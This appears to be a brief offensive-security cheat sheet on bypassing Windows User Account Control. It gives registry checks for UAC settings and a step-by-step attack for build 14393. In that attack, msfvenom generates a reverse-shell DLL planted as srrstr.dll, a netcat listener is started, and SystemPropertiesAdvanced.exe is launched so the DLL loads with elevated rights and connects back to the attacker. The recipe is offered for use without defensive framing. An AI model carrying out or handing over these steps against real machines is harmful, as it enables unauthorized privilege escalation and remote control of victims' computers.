User Account Control (UAC) Bypass

UAC bypasses leverage flaws or unintended functionality in different Windows builds.

The following repository contains many different UAC Bypassing Techniques: https://github.com/hfiref0x/UACME

Initial Enumeration

Check if UAC is enabled (0x1=true): REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

Check the UAC level(0x5=max level): REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

To check the Windows Build: [environment]::OSVersion.Version

Check this repository and see if anything exists for the target build number

Example - UAC Bypass in Windows Build 14393

1. We can basically bypass UAC by placing a malicious srrstr.dll DLL to the WindowsApps folder, which will be loaded in an elevated context

2. Generate malicious DLL file: msfvenom -p windows/shell_reverse_tcp LHOST=our-ip LPORT=listening-port -f dll > srrstr.dll

3. Transfer the DLL on the target machine

4. Start a netcat listener on the attacker machine: nc -lvnp 4444

5. Get a reverse shell: C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe